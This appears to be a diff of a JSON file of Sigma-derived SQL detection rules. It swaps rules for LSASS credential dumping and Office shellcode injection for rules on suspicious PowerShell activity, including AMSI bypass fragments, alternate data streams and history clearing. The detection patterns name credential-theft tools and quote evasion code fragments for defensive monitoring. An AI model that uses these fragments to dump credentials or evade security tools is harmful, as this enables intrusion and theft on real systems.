"attack.t1003.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_syncappvpublishingserver_exe.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", + "title": "Powershell Create Scheduled Task", + "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", + "author": "frack113", "tags": [ - "attack.t1548" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_cmdlet_scheduled_task.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "title": "Powershell LocalAccount Manipulation", + "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_localuser.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + "title": "Clear PowerShell History - PowerShell", + "id": "26b692dc-1722-49b2-b496-a8258aa6371d", + "status": "experimental", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_clear_powershell_history.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "title": "Security Software Discovery by Powershell", + "id": "904e8e61-8edf-4350-b59c-b905fc8e810c", "status": "test", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-process%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Description%' ESCAPE '\\' AND ScriptBlockText LIKE '%-like%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\"%virus%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%carbonblack%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%defender%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%cylance%\"%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_security_software_discovery.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "title": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy", + "id": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.discovery", + "attack.t1201" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdDefaultDomainPasswordPolicy%' ESCAPE '\\')" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Suspicious PowerShell Keywords", + "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", + "status": "test", + "description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework", + "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.CustomAttributeBuilder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.UnmanagedType%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_susp_keywords.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Recon Information for Export with PowerShell", + "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_susp_recon_export.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "title": "Powershell XML Execute Command", + "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" + 